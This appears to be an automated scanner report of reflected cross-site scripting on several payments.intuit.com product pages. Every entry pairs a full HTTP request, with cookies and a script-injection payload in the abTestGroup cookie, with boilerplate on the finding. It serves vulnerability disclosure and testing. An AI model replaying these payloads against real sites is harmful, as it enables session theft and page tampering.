GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1647c3d"><script>alert(1)</script>97f3c4b0963;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83731"><script>alert(1)</script>8d0a1b75f18 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1683731"><script>alert(1)</script>8d0a1b75f18;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d7ba9<script>alert(1)</script>df514fb9a00 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d7ba9<script>alert(1)</script>df514fb9a00;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe97"><script>alert(1)</script>b605d5bc92b was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/echecks-and-check-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bfe97"><script>alert(1)</script>b605d5bc92b;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e3cdf<script>alert(1)</script>457e3b04e25 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/echecks-and-check-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e3cdf<script>alert(1)</script>457e3b04e25;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 94dbf<script>alert(1)</script>468c7862810 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/internet-merchant-accounts.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1694dbf<script>alert(1)</script>468c7862810;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32b2"><script>alert(1)</script>eca551a06e2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/internet-merchant-accounts.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16a32b2"><script>alert(1)</script>eca551a06e2;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40f2"><script>alert(1)</script>2ecf5ecc899 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e40f2"><script>alert(1)</script>2ecf5ecc899;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ff5ed<script>alert(1)</script>1c8e4d0787a was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ff5ed<script>alert(1)</script>1c8e4d0787a;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 6fb36<script>alert(1)</script>4c918b363ab was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T166fb36<script>alert(1)</script>4c918b363ab;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66866"><script>alert(1)</script>32afa1f3f6c was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1666866"><script>alert(1)</script>32afa1f3f6c;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d3b88<script>alert(1)</script>6e2a002a14f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d3b88<script>alert(1)</script>6e2a002a14f;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19d02"><script>alert(1)</script>94241c27c76 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1619d02"><script>alert(1)</script>94241c27c76;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d5f4"><script>alert(1)</script>87efd050621 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
